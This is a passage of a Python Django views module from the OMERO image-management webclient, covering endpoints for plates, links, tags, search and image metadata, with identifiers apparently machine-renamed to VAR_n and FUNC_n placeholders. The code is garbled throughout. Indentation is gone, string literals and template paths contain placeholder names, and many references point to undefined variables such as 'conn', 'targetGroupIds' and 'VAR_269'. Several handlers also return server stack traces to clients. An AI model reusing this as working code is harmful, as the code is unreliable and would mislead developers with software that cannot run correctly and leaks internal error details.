VAR_5=conn, VAR_251=screen_id, VAR_20=group_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"plates": VAR_110})
@login_required()
def FUNC_19(VAR_2, VAR_5=None, **VAR_6):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_252 = FUNC_0(VAR_2, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if VAR_252 is None:
return HttpResponseBadRequest("id (VAR_421) must be specified")
try:
VAR_253 = tree.marshal_plate_acquisitions(
VAR_5=conn, VAR_252=plate_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"acquisitions": VAR_253})
def FUNC_20(VAR_5, VAR_12, VAR_13, VAR_14, VAR_15):
if VAR_12 == "orphaned":
return None
VAR_72 = None
if VAR_12 == "experimenter":
if VAR_14 in ["dataset", "plate", "tag"]:
return None
elif VAR_12 == "project":
if VAR_14 == "dataset":
VAR_72 = "ProjectDatasetLink"
elif VAR_12 == "dataset":
if VAR_14 == "image":
VAR_72 = "DatasetImageLink"
elif VAR_12 == "screen":
if VAR_14 == "plate":
VAR_72 = "ScreenPlateLink"
elif VAR_12 == "tagset":
if VAR_14 == "tag":
VAR_72 = "AnnotationAnnotationLink"
if not VAR_72:
raise Http404("json VAR_158 needs 'parent_type' and 'child_type'")
VAR_73 = omero.sys.ParametersI()
VAR_73.addIds(VAR_15)
VAR_74 = VAR_5.getQueryService()
VAR_75 = (
"""
from %s olink join fetch olink.child join fetch olink.parent
where olink.child.id in (:VAR_187)
"""
% VAR_72
)
if VAR_13:
VAR_73.add("pid", rlong(VAR_13))
VAR_75 += " and olink.parent.id = :pid"
VAR_76 = VAR_74.findAllByQuery(VAR_75, VAR_73, VAR_5.SERVICE_OPTS)
if VAR_13 is not None and len(VAR_76) == 0:
raise Http404(
"No VAR_344 found for %s-%s to %s-%s"
% (VAR_12, VAR_13, VAR_14, VAR_15)
)
return VAR_72, VAR_76
def FUNC_21(VAR_12, VAR_13, VAR_14, VAR_16):
if VAR_12 == "experimenter":
if VAR_14 == "dataset" or VAR_14 == "plate":
return "orphan"
if VAR_12 == "project":
VAR_254 = ProjectI(VAR_241(VAR_13), False)
if VAR_14 == "dataset":
VAR_343 = DatasetI(VAR_241(VAR_16), False)
VAR_344 = ProjectDatasetLinkI()
VAR_344.setParent(VAR_254)
VAR_344.setChild(VAR_343)
return VAR_344
elif VAR_12 == "dataset":
VAR_343 = DatasetI(VAR_241(VAR_13), False)
if VAR_14 == "image":
VAR_142 = ImageI(VAR_241(VAR_16), False)
VAR_344 = DatasetImageLinkI()
VAR_344.setParent(VAR_343)
VAR_344.setChild(VAR_142)
return VAR_344
elif VAR_12 == "screen":
VAR_384 = ScreenI(VAR_241(VAR_13), False)
if VAR_14 == "plate":
VAR_421 = PlateI(VAR_241(VAR_16), False)
VAR_344 = ScreenPlateLinkI()
VAR_344.setParent(VAR_384)
VAR_344.setChild(VAR_421)
return VAR_344
elif VAR_12 == "tagset":
if VAR_14 == "tag":
VAR_344 = AnnotationAnnotationLinkI()
VAR_344.setParent(TagAnnotationI(VAR_241(VAR_13), False))
VAR_344.setChild(TagAnnotationI(VAR_241(VAR_16), False))
return VAR_344
return None
def FUNC_22(VAR_5, VAR_14, VAR_15):
if VAR_14 == "tag":
VAR_14 = "Annotation"
VAR_77 = {}
for VAR_38 in VAR_5.getObjects(VAR_14, VAR_15):
VAR_77[VAR_38.id] = VAR_38.details.owner.id.val
return VAR_77
@login_required()
def FUNC_23(VAR_2, VAR_5=None, **VAR_6):
if VAR_2.method not in ["POST", "DELETE"]:
return JsonResponse(
{"Error": "Need to POST or DELETE JSON VAR_158 to VAR_230 links"}, VAR_313=405
)
try:
VAR_17 = json.loads(VAR_2.body)
except TypeError:
VAR_17 = json.loads(bytes_to_native_str(VAR_2.body))
if VAR_2.method == "POST":
return FUNC_24(VAR_5, VAR_17)
elif VAR_2.method == "DELETE":
return FUNC_25(VAR_5, VAR_17)
def FUNC_24(VAR_5, VAR_17, **VAR_6):
VAR_78 = {"success": False}
VAR_79 = []
VAR_80 = "WriteOwned" in VAR_5.getCurrentAdminPrivileges()
VAR_66 = VAR_5.getUserId()
for VAR_12, VAR_82 in VAR_17.items():
if VAR_12 in ("orphaned", "experimenter"):
continue
for VAR_13, children in VAR_82.items():
for VAR_14, VAR_15 in children.items():
VAR_385 = FUNC_22(VAR_5, VAR_14, VAR_15)
for VAR_16 in VAR_15:
VAR_13 = int(VAR_13)
VAR_344 = FUNC_21(VAR_12, VAR_13, VAR_14, VAR_16)
if VAR_344 and VAR_344 != "orphan":
if VAR_80 and VAR_385[VAR_16] != VAR_66:
VAR_344.details.owner = ExperimenterI(
VAR_385[VAR_16], False
)
VAR_79.append(VAR_344)
if len(VAR_79) > 0:
VAR_255 = VAR_12.title()
if VAR_255 in ["Tagset", "Tag"]:
VAR_255 = "TagAnnotation"
VAR_256 = VAR_5.getQueryService().get(VAR_255, VAR_13, VAR_5.SERVICE_OPTS)
VAR_5.SERVICE_OPTS.setOmeroGroup(VAR_256.details.group.id.val)
VAR_0.info("api_link: Saving %s links" % len(VAR_79))
try:
VAR_5.saveArray(VAR_79)
VAR_78["success"] = True
except Exception:
VAR_0.info(
"api_link: Exception on saveArray with %s links" % len(VAR_79)
)
for VAR_344 in VAR_79:
try:
VAR_5.saveObject(VAR_344)
except Exception:
pass
VAR_78["success"] = True
return JsonResponse(VAR_78)
def FUNC_25(VAR_5, VAR_17):
VAR_78 = {"success": False}
for VAR_12, VAR_82 in VAR_17.items():
if VAR_12 == "orphaned":
continue
for VAR_13, children in VAR_82.items():
for VAR_14, VAR_15 in children.items():
VAR_386 = FUNC_20(
VAR_5, VAR_12, VAR_13, VAR_14, VAR_15
)
if VAR_386 is None:
continue
VAR_387, VAR_240 = VAR_386
VAR_388 = [VAR_71.id.val for VAR_71 in VAR_240]
VAR_0.info("api_link: Deleting %s links" % len(VAR_388))
VAR_5.deleteObjects(VAR_387, VAR_388, wait=True)
VAR_387, VAR_389 = FUNC_20(
VAR_5, VAR_12, None, VAR_14, VAR_15
)
for rl in VAR_389:
VAR_359 = rl.parent.id.val
VAR_422 = rl.child.id.val
if VAR_359 == int(VAR_13):
continue
if VAR_12 not in VAR_78:
VAR_78[VAR_12] = {}
if VAR_359 not in VAR_78[VAR_12]:
VAR_78[VAR_12][VAR_359] = {VAR_14: []}
VAR_78[VAR_12][VAR_359][VAR_14].append(VAR_422)
VAR_78["success"] = True
return JsonResponse(VAR_78)
@login_required()
def FUNC_26(VAR_2, VAR_5=None, **VAR_6):
VAR_81 = {"image": "dataset", "dataset": "project", "plate": "screen"}
VAR_82 = []
for VAR_14, VAR_12 in VAR_81.items():
VAR_187 = VAR_2.GET.getlist(VAR_14)
if len(VAR_187) == 0:
continue
VAR_15 = []
for id in VAR_187:
for VAR_318 in id.split(","):
VAR_15.append(VAR_318)
VAR_72, VAR_223 = FUNC_20(
VAR_5, VAR_12, None, VAR_14, VAR_15
)
for VAR_344 in VAR_223:
VAR_82.append(
{
"id": VAR_344.id.val,
"parent": {"type": VAR_12, "id": VAR_344.parent.id.val},
"child": {"type": VAR_14, "id": VAR_344.child.id.val},
}
)
return JsonResponse({"data": VAR_82})
@login_required()
def FUNC_27(VAR_2, VAR_5=None, **VAR_6):
try:
VAR_11 = FUNC_0(VAR_2, "experimenter", None)
VAR_245 = FUNC_0(VAR_2, "project", None)
VAR_246 = FUNC_0(VAR_2, "dataset", None)
VAR_257 = FUNC_0(VAR_2, "image", None)
VAR_251 = FUNC_0(VAR_2, "screen", None)
VAR_252 = FUNC_0(VAR_2, "plate", None)
VAR_258 = FUNC_0(VAR_2, "run", None)
VAR_258 = FUNC_0(VAR_2, "acquisition", VAR_258)
VAR_259 = VAR_2.GET.get("well", None)
VAR_260 = FUNC_0(VAR_2, "tag", None)
VAR_261 = FUNC_0(VAR_2, "tagset", None)
VAR_262 = FUNC_0(VAR_2, "roi", None)
VAR_263 = FUNC_0(VAR_2, "shape", None)
VAR_20 = FUNC_0(VAR_2, "group", None)
VAR_264 = FUNC_0(VAR_2, "page_size", settings.PAGE)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if VAR_260 is not None or VAR_261 is not None:
VAR_265 = paths_to_tag(VAR_5, VAR_11, VAR_261, VAR_260)
else:
VAR_265 = paths_to_object(
VAR_5,
VAR_11,
VAR_245,
VAR_246,
VAR_257,
VAR_251,
VAR_252,
VAR_258,
VAR_259,
VAR_20,
VAR_264,
VAR_262,
VAR_263,
)
return JsonResponse({"paths": VAR_265})
@login_required()
def FUNC_28(VAR_2, VAR_5=None, **VAR_6):
if VAR_2.method == "GET":
return FUNC_29(VAR_2, VAR_5, **VAR_6)
elif VAR_2.method == "DELETE":
return FUNC_30(VAR_2, VAR_5, **VAR_6)
def FUNC_29(VAR_2, VAR_5=None, **VAR_6):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_260 = FUNC_0(VAR_2, "id", None)
VAR_11 = FUNC_0(VAR_2, "experimenter_id", -1)
VAR_247 = FUNC_3(VAR_2, "orphaned", False)
VAR_248 = FUNC_3(VAR_2, "sizeXYZ", False)
VAR_250 = FUNC_3(VAR_2, "date", False)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
if VAR_260 is not None:
VAR_266 = tree.marshal_tagged(
VAR_5=conn,
VAR_11=experimenter_id,
VAR_260=tag_id,
VAR_20=group_id,
VAR_87=page,
VAR_248=load_pixels,
VAR_250=date,
VAR_88=limit,
)
else:
VAR_266 = {}
VAR_266["tags"] = tree.marshal_tags(
VAR_5=conn,
VAR_247=orphaned,
VAR_11=experimenter_id,
VAR_260=tag_id,
VAR_20=group_id,
VAR_87=page,
VAR_88=limit,
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(VAR_266)
def FUNC_30(VAR_2, VAR_5=None, **VAR_6):
try:
VAR_267 = FUNC_2(VAR_2, "id")
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
VAR_83 = list()
VAR_84 = None
try:
for VAR_260 in VAR_267:
VAR_83.append(omero.cmd.Delete("/Annotation", VAR_260))
VAR_268 = omero.cmd.DoAll()
VAR_268.requests = VAR_83
VAR_84 = VAR_5.c.sf.submit(VAR_268, VAR_5.SERVICE_OPTS)
try:
VAR_5._waitOnCmd(VAR_84)
finally:
VAR_84.close()
except CmdError as e:
return HttpResponseBadRequest(e.message)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse("")
@login_required()
def FUNC_31(VAR_2, VAR_5=None, **VAR_6):
VAR_71 = VAR_2.GET
VAR_46 = FUNC_1(VAR_2, "image")
VAR_45 = FUNC_1(VAR_2, "dataset")
VAR_44 = FUNC_1(VAR_2, "project")
VAR_47 = FUNC_1(VAR_2, "screen")
VAR_48 = FUNC_1(VAR_2, "plate")
VAR_85 = FUNC_1(VAR_2, "acquisition")
VAR_86 = FUNC_1(VAR_2, "well")
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", VAR_1)
VAR_89 = VAR_71.get("type", None)
VAR_90 = VAR_71.get("ns", None)
VAR_91, VAR_92 = tree.marshal_annotations(
VAR_5,
VAR_44=project_ids,
VAR_45=dataset_ids,
VAR_46=image_ids,
VAR_47=screen_ids,
VAR_48=plate_ids,
VAR_85=run_ids,
VAR_86=well_ids,
VAR_89=ann_type,
VAR_90=ns,
VAR_87=page,
VAR_88=limit,
)
return JsonResponse({"annotations": VAR_91, "experimenters": VAR_92})
@login_required()
def FUNC_32(VAR_2, VAR_5=None, **VAR_6):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_244 = FUNC_0(VAR_2, "member_id", -1)
VAR_231 = FUNC_0(VAR_2, "owner_id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
VAR_112 = tree.marshal_shares(
VAR_5=conn, VAR_244=member_id, VAR_231=owner_id, VAR_87=page, VAR_88=limit
)
discussions = tree.marshal_discussions(
VAR_5=conn, VAR_244=member_id, VAR_231=owner_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"shares": VAR_112, "discussions": VAR_269})
@login_required()
@render_response()
def FUNC_33(VAR_2, VAR_18=None, VAR_19=None, VAR_5=None, **VAR_6):
VAR_93 = getIntOrDefault(VAR_2, "index", 0)
VAR_94 = dict()
if VAR_18 is not None:
if VAR_19 is not None and int(VAR_19) > 0:
VAR_94[VAR_345(VAR_18)] = VAR_241(VAR_19)
try:
VAR_104 = BaseContainer(VAR_5, **VAR_94)
except AttributeError as x:
return handlerInternalError(VAR_2, x)
VAR_95 = None
VAR_53 = {"manager": VAR_104, "form_well_index": VAR_95, "index": VAR_93}
VAR_54 = None
if "plate" in VAR_94 or "acquisition" in VAR_94:
VAR_270 = VAR_104.getNumberOfFields()
if VAR_270 is not None:
VAR_95 = WellIndexForm(VAR_115={"index": VAR_93, "range": VAR_270})
if VAR_93 == 0:
VAR_93 = VAR_270[0]
VAR_59 = VAR_2.GET.get("show")
if VAR_59 is not None:
VAR_346 = []
for w in VAR_59.split("|"):
if "well-" in w:
VAR_346.append(w.replace("well-", ""))
VAR_53["select_wells"] = ",".join(VAR_346)
VAR_53["baseurl"] = VAR_350("webgateway").rstrip("/")
VAR_53["form_well_index"] = VAR_95
VAR_53["index"] = VAR_93
VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
VAR_54 = "webclient/VAR_158/VAR_421.html"
if VAR_18 == "acquisition":
VAR_53["acquisition"] = VAR_19
VAR_53["isLeader"] = VAR_5.isLeader()
VAR_53["template"] = VAR_54
return VAR_53
@login_required()
@render_response()
def FUNC_34(VAR_2, VAR_5=None, **VAR_6):
VAR_96 = []
VAR_97 = set()
VAR_98 = []
VAR_68 = {}
VAR_77 = {}
for VAR_215 in ("Project", "Dataset", "Image", "Screen", "Plate"):
VAR_154 = VAR_2.GET.get(VAR_215, None)
if VAR_154 is not None:
for o in VAR_5.getObjects(VAR_215, VAR_154.split(",")):
VAR_96.append(o.getDetails().owner.id.val)
VAR_97.add(o.getDetails().group.id.val)
VAR_96 = list(set(VAR_96))
if len(VAR_96) == 0:
VAR_96 = [VAR_5.getUserId()]
for VAR_103 in VAR_5.getObjects(
"Experimenter", VAR_96, opts={"load_experimentergroups": True}
):
VAR_271 = []
VAR_77[VAR_103.id] = VAR_103.getFullName()
for VAR_101 in VAR_103.copyGroupExperimenterMap():
VAR_68[VAR_101.parent.id.val] = VAR_101.parent
VAR_271.append(VAR_101.parent.id.val)
VAR_98.append(set(VAR_271))
VAR_99 = set.intersection(*VAR_98)
VAR_100 = VAR_5.getAdminService().getSecurityRoles().userGroupId
if VAR_100 in VAR_99:
targetGroupIds.remove(VAR_100)
if len(VAR_97) == 1:
VAR_272 = VAR_97.pop()
if VAR_272 in VAR_99:
targetGroupIds.remove(VAR_272)
def FUNC_83(VAR_101):
VAR_256 = VAR_101.getDetails().permissions
return {
"write": VAR_256.isGroupWrite(),
"annotate": VAR_256.isGroupAnnotate(),
"read": VAR_256.isGroupRead(),
}
VAR_102 = []
for VAR_335 in VAR_99:
VAR_102.append(
{"id": VAR_335, "name": VAR_68[VAR_335].name.val, "perms": FUNC_83(VAR_68[VAR_335])}
)
VAR_102.sort(VAR_310=lambda x: x["name"])
VAR_77 = [[VAR_415, VAR_416] for VAR_415, VAR_416 in VAR_77.items()]
return {"owners": VAR_77, "groups": VAR_102}
@login_required()
@render_response()
def FUNC_35(VAR_2, VAR_20, VAR_21, VAR_5=None, **VAR_6):
VAR_5.SERVICE_OPTS.setOmeroGroup(int(VAR_20))
VAR_103 = getIntOrDefault(VAR_2, "owner", None)
VAR_104 = BaseContainer(VAR_5)
VAR_104.listContainerHierarchy(VAR_103)
VAR_54 = "webclient/VAR_158/chgrp_target_tree.html"
VAR_53 = {"manager": VAR_104, "target_type": VAR_21, "template": VAR_54}
return VAR_53
@login_required()
@render_response()
def FUNC_36(VAR_2, VAR_22=None, VAR_5=None, **VAR_6):
VAR_104 = BaseSearch(VAR_5)
VAR_105 = []
VAR_71 = VAR_2.GET
if VAR_22 is not None:
VAR_273 = VAR_71.get("query", None)
if VAR_273 is None:
return HttpResponse("No search '?query' included")
VAR_273 = query_search.replace("+", " ")
VAR_274 = toBoolean(VAR_71.get("advanced"))
if VAR_274:
VAR_273 = VAR_71.get("advanced_search")
VAR_54 = "webclient/search/search_details.html"
VAR_275 = VAR_71.getlist("datatype")
VAR_270 = VAR_71.getlist("field")
VAR_276 = VAR_71.get("searchGroup", None)
VAR_277 = VAR_71.get("ownedBy", None)
VAR_278 = toBoolean(VAR_71.get("useAcquisitionDate"))
VAR_279 = VAR_71.get("startdateinput", None)
VAR_279 = VAR_279 is not None and smart_str(VAR_279) or None
VAR_280 = VAR_71.get("enddateinput", None)
VAR_280 = VAR_280 is not None and smart_str(VAR_280) or None
VAR_250 = None
if VAR_279 is not None:
if VAR_280 is None:
VAR_390 = datetime.datetime.now()
VAR_280 = "%s-%02d-%02d" % (VAR_390.year, VAR_390.month, VAR_390.day)
VAR_250 = "%s_%s" % (VAR_279, VAR_280)
if len(VAR_275) == 0:
VAR_275 = ["images"]
VAR_104.search(
VAR_273,
VAR_275,
VAR_270,
VAR_276,
VAR_277,
VAR_278,
VAR_250,
rawQuery=VAR_274,
)
VAR_281 = re.compile(r"^[\VAR_362 ,]+$")
if VAR_281.search(VAR_273) is not None:
VAR_5.SERVICE_OPTS.setOmeroGroup(-1)
VAR_347 = set()
for queryId in re.split(" |,", VAR_273):
if len(queryId) == 0:
continue
try:
VAR_423 = VAR_241(queryId)
if VAR_423 in VAR_347:
continue
VAR_347.add(VAR_423)
for VAR_433 in VAR_275:
VAR_433 = VAR_433[0:-1] # remove 's'
if VAR_433 in (
"project",
"dataset",
"image",
"screen",
"plate",
"well",
):
VAR_38 = VAR_5.getObject(VAR_433, VAR_423)
if VAR_38 is not None:
VAR_105.append({"otype": VAR_433, "obj": VAR_38})
except ValueError:
pass
else:
VAR_54 = "webclient/search/search.html"
VAR_53 = {
"manager": VAR_104,
"foundById": VAR_105,
"resultCount": VAR_104.c_size + len(VAR_105),
}
VAR_53["template"] = VAR_54
VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
return VAR_53
@login_required()
@render_response()
def FUNC_37(VAR_2, VAR_23, VAR_24, VAR_5=None, VAR_25=None, **VAR_6):
VAR_93 = getIntOrDefault(VAR_2, "index", 0)
VAR_53 = dict()
VAR_106 = VAR_23 == "image" and list(VAR_5.getObjects("Image", [VAR_24])) or list()
VAR_107 = (
VAR_23 == "dataset" and list(VAR_5.getObjects("Dataset", [VAR_24])) or list()
)
VAR_108 = (
VAR_23 == "project" and list(VAR_5.getObjects("Project", [VAR_24])) or list()
)
VAR_109 = VAR_23 == "screen" and list(VAR_5.getObjects("Screen", [VAR_24])) or list()
VAR_110 = VAR_23 == "plate" and list(VAR_5.getObjects("Plate", [VAR_24])) or list()
VAR_111 = (
VAR_23 == "acquisition"
and list(VAR_5.getObjects("PlateAcquisition", [VAR_24]))
or list()
)
VAR_112 = (
(VAR_23 == "share" or VAR_23 == "discussion")
and [VAR_5.getShare(VAR_24)]
or list()
)
VAR_113 = VAR_23 == "well" and list(VAR_5.getObjects("Well", [VAR_24])) or list()
VAR_114 = {
"images": VAR_23 == "image" and [VAR_24] or [],
"datasets": VAR_23 == "dataset" and [VAR_24] or [],
"projects": VAR_23 == "project" and [VAR_24] or [],
"screens": VAR_23 == "screen" and [VAR_24] or [],
"plates": VAR_23 == "plate" and [VAR_24] or [],
"acquisitions": VAR_23 == "acquisition" and [VAR_24] or [],
"wells": VAR_23 == "well" and [VAR_24] or [],
"shares": ((VAR_23 == "share" or VAR_23 == "discussion") and [VAR_24] or []),
}
VAR_115 = {
"selected": VAR_114,
"images": VAR_106,
"datasets": VAR_107,
"projects": VAR_108,
"screens": VAR_109,
"plates": VAR_110,
"acquisitions": VAR_111,
"wells": VAR_113,
"shares": VAR_112,
}
VAR_116 = None
VAR_117 = None
if VAR_23 in ("share", "discussion"):
VAR_54 = "webclient/annotations/annotations_share.html"
VAR_104 = BaseShare(VAR_5, VAR_24)
VAR_104.getAllUsers(VAR_24)
VAR_104.getComments(VAR_24)
VAR_116 = CommentAnnotationForm(VAR_115=initial)
else:
try:
VAR_104 = BaseContainer(VAR_5, **{VAR_345(VAR_23): VAR_241(VAR_24), "index": VAR_93})
except AttributeError as x:
return handlerInternalError(VAR_2, x)
if VAR_25 is not None:
VAR_54 = "webclient/annotations/annotations_share.html"
VAR_53["share"] = BaseShare(VAR_5, VAR_25)
else:
VAR_54 = "webclient/annotations/metadata_general.html"
VAR_53["canExportAsJpg"] = VAR_104.canExportAsJpg(VAR_2)
VAR_53["annotationCounts"] = VAR_104.getAnnotationCounts()
VAR_117 = VAR_104.listFigureScripts()
VAR_53["manager"] = VAR_104
if VAR_23 in ("tag", "tagset"):
VAR_53["insight_ns"] = omero.rtypes.rstring(
omero.constants.metadata.NSINSIGHTTAGSET
).val
if VAR_116 is not None:
VAR_53["form_comment"] = VAR_116
VAR_53["figScripts"] = VAR_117
VAR_53["template"] = VAR_54
VAR_53["webclient_path"] = VAR_350("webindex")
return VAR_53
@login_required()
@render_response()
def FUNC_38(VAR_2, VAR_23, VAR_24, VAR_5=None, VAR_25=None, **VAR_6):
VAR_53 = {}
VAR_93 = getIntOrDefault(VAR_2, "index", 0)
VAR_104 = BaseContainer(VAR_5, **{VAR_345(VAR_23): VAR_241(VAR_24)})
if VAR_25:
VAR_53["share"] = BaseShare(VAR_5, VAR_25)
if VAR_23 == "well":
VAR_104.image = VAR_104.well.getImage(VAR_93)
VAR_118 = VAR_104.image.getAllRenderingDefs()
VAR_119 = {}
VAR_120 = VAR_104.image.getRenderingDefId()
for VAR_71 in VAR_118:
VAR_229 = VAR_71["owner"]["id"]
VAR_71["current"] = VAR_71["id"] == VAR_120
if VAR_229 not in VAR_119 or VAR_119[VAR_229]["id"] < VAR_71["id"]:
VAR_119[VAR_229] = VAR_71
VAR_119 = rdefs.values()
VAR_121 = []
for VAR_71 in VAR_119:
VAR_282 = []
for VAR_318, VAR_383 in enumerate(VAR_71["c"]):
VAR_348 = "-"
if VAR_383["active"]:
VAR_348 = ""
VAR_349 = VAR_383["lut"] if "lut" in VAR_383 else VAR_383["color"]
VAR_350 = "r" if VAR_383["inverted"] else "-r"
VAR_282.append(
"%s%s|%s:%s%s$%s" % (VAR_348, VAR_318 + 1, VAR_383["start"], VAR_383["end"], VAR_350, VAR_349)
)
VAR_121.append(
{
"id": VAR_71["id"],
"owner": VAR_71["owner"],
"c": ",".join(VAR_282),
"m": VAR_71["model"] == "greyscale" and "g" or "c",
}
)
VAR_122, VAR_123 = VAR_5.getMaxPlaneSize()
VAR_124 = VAR_104.image.getSizeX()
VAR_125 = VAR_104.image.getSizeY()
VAR_53["tiledImage"] = (VAR_124 * VAR_125) > (VAR_122 * VAR_123)
VAR_53["manager"] = VAR_104
VAR_53["rdefsJson"] = json.dumps(VAR_121)
VAR_53["rdefs"] = VAR_119
VAR_53["template"] = "webclient/annotations/metadata_preview.html"
return VAR_53
@login_required()
@render_response()
def FUNC_39(VAR_2, VAR_23, VAR_24, VAR_5=None, **VAR_6):
VAR_104 = BaseContainer(VAR_5, **{VAR_345(VAR_23): VAR_241(VAR_24)})
VAR_53 = {"manager": VAR_104}
VAR_53["template"] = "webclient/annotations/metadata_hierarchy.html"
return VAR_53
@login_required()
@render_response()
def FUNC_40(
VAR_2, VAR_23, VAR_24, VAR_5=None, VAR_25=None, **VAR_6
):
try:
if VAR_23 in ("share", "discussion"):
VAR_54 = "webclient/annotations/annotations_share.html"
VAR_104 = BaseShare(VAR_5, VAR_24)
VAR_104.getAllUsers(VAR_24)
VAR_104.getComments(VAR_24)
else:
VAR_54 = "webclient/annotations/metadata_acquisition.html"
VAR_104 = BaseContainer(VAR_5, **{VAR_345(VAR_23): VAR_241(VAR_24)})
except AttributeError as x:
return handlerInternalError(VAR_2, x)
VAR_126 = None
VAR_127 = None
VAR_128 = None
VAR_129 = list()
VAR_130 = None
VAR_131 = list()
VAR_132 = list()
VAR_133 = list()
VAR_134 = list()
VAR_135 = list()
VAR_136 = list(VAR_5.getEnumerationEntries("LaserType"))
VAR_137 = list(VAR_5.getEnumerationEntries("ArcType"))
VAR_138 = list(VAR_5.getEnumerationEntries("FilamentType"))
VAR_139 = None
VAR_140 = None
VAR_141 = None
if VAR_23 == "image":
if VAR_25 is None:
VAR_104.companionFiles()
VAR_104.channelMetadata()
for theC, ch in enumerate(VAR_104.channel_metadata):
VAR_351 = ch.getLogicalChannel()
if VAR_351 is not None:
VAR_391 = dict()
VAR_391["form"] = MetadataChannelForm(
VAR_115={
"logicalChannel": VAR_351,
"exWave": ch.getExcitationWave(units=True),
"emWave": ch.getEmissionWave(units=True),
"illuminations": list(
VAR_5.getEnumerationEntries("IlluminationI")
),
"contrastMethods": list(
VAR_5.getEnumerationEntries("ContrastMethodI")
),
"modes": list(VAR_5.getEnumerationEntries("AcquisitionModeI")),
}
)
if VAR_25 is None:
VAR_424 = VAR_351.getLightPath()
if VAR_424 is not None:
VAR_391["form_dichroic"] = None
VAR_391["form_excitation_filters"] = list()
VAR_391["form_emission_filters"] = list()
VAR_434 = VAR_424.getDichroic()
if VAR_434 is not None:
VAR_391["form_dichroic"] = MetadataDichroicForm(
VAR_115={"dichroic": VAR_434}
)
VAR_435 = list(VAR_5.getEnumerationEntries("FilterTypeI"))
for f in VAR_424.getEmissionFilters():
VAR_391["form_emission_filters"].append(
MetadataFilterForm(
VAR_115={"filter": f, "types": VAR_435}
)
)
for f in VAR_424.getExcitationFilters():
VAR_391["form_excitation_filters"].append(
MetadataFilterForm(
VAR_115={"filter": f, "types": VAR_435}
)
)
VAR_425 = VAR_351.getDetectorSettings()
if (
VAR_425._obj is not None
and VAR_425.getDetector()
):
VAR_391["form_detector_settings"] = MetadataDetectorForm(
VAR_115={
"detectorSettings": VAR_425,
"detector": VAR_425.getDetector(),
"types": list(
VAR_5.getEnumerationEntries("DetectorTypeI")
),
"binnings": list(VAR_5.getEnumerationEntries("Binning")),
}
)
VAR_426 = VAR_351.getLightSourceSettings()
if (
VAR_426 is not None
and VAR_426._obj is not None
):
VAR_436 = VAR_426.getLightSource()
if VAR_436 is not None:
VAR_439 = VAR_136
if VAR_436.OMERO_CLASS == "Arc":
VAR_439 = VAR_137
elif VAR_436.OMERO_CLASS == "Filament":
VAR_439 = VAR_138
VAR_391["form_light_source"] = MetadataLightSourceForm(
VAR_115={
"lightSource": VAR_436,
"lightSourceSettings": VAR_426,
"lstypes": VAR_439,
"mediums": list(
VAR_5.getEnumerationEntries("LaserMediumI")
),
"pulses": list(
VAR_5.getEnumerationEntries("PulseI")
),
}
)
VAR_391["label"] = ch.getLabel()
VAR_349 = ch.getColor()
VAR_391["color"] = VAR_349 is not None and VAR_349.getHtml() or None
VAR_392 = (
VAR_104.image
and VAR_104.image.getPrimaryPixels().copyPlaneInfo(
theC=theC, theZ=0
)
)
VAR_393 = []
for pi in VAR_392:
VAR_427 = pi.getDeltaT(units="SECOND")
VAR_428 = pi.getExposureTime(units="SECOND")
if VAR_427 is None and VAR_428 is None:
continue
if VAR_427 is not None:
VAR_427 = deltaT.getValue()
if VAR_428 is not None:
VAR_428 = exposure.getValue()
VAR_393.append(
{"theT": pi.theT, "deltaT": VAR_427, "exposureTime": VAR_428}
)
VAR_391["plane_info"] = VAR_393
VAR_134.append(VAR_391)
try:
VAR_142 = VAR_104.well.getWellSample().image()
except Exception:
VAR_142 = VAR_104.image
if VAR_25 is None: # 9853
if VAR_142.getObjectiveSettings() is not None:
if VAR_139 is None:
VAR_139 = list(VAR_5.getEnumerationEntries("MediumI"))
if VAR_140 is None:
VAR_140 = list(VAR_5.getEnumerationEntries("ImmersionI"))
if VAR_141 is None:
VAR_141 = list(VAR_5.getEnumerationEntries("CorrectionI"))
VAR_127 = MetadataObjectiveSettingsForm(
VAR_115={
"objectiveSettings": VAR_142.getObjectiveSettings(),
"objective": VAR_142.getObjectiveSettings().getObjective(),
"mediums": VAR_139,
"immersions": VAR_140,
"corrections": VAR_141,
}
)
if VAR_142.getImagingEnvironment() is not None:
VAR_126 = MetadataEnvironmentForm(VAR_115={"image": VAR_142})
if VAR_142.getStageLabel() is not None:
VAR_130 = MetadataStageLabelForm(VAR_115={"image": VAR_142})
VAR_352 = VAR_142.getInstrument()
if VAR_352 is not None:
if VAR_352.getMicroscope() is not None:
VAR_128 = MetadataMicroscopeForm(
VAR_115={
"microscopeTypes": list(
VAR_5.getEnumerationEntries("MicroscopeTypeI")
),
"microscope": VAR_352.getMicroscope(),
}
)
VAR_394 = VAR_352.getObjectives()
